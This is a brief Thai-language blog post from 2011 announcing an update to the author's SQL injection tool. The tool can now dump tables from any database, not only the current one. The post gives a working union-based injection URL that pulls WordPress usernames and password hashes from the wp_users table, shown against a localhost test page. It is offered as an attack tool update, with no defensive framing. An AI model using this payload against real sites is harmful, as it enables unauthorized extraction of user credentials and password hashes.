หน้าเว็บ

วันเสาร์ที่ 27 สิงหาคม พ.ศ. 2554

SQLi Tool ใช้ Dump Data ข้าม DataBase ได้แล้วววเพิ่งมารู้ตอนเขียน IRC Bot เอง แหะๆ เลยถือโอกาสแก้บัคไปด้วยเลย เมื่อก่อนที่เขียนคือ Dump ได้แค่ database() หรือ Current DataBase เท่านั้น แต่ตอนนี้แก้ใหม่แล้วดั้มได้ทุก DB

from+database.table--

http://localhost/sqlibug.php?id=1+and+1=2+union+all+select+group_concat(ID,CHAR(32,58,32),user_login,CHAR(32,58,32),user_pass),2,3+from+wordpress.wp_users--

ไม่มีความคิดเห็น:

แสดงความคิดเห็น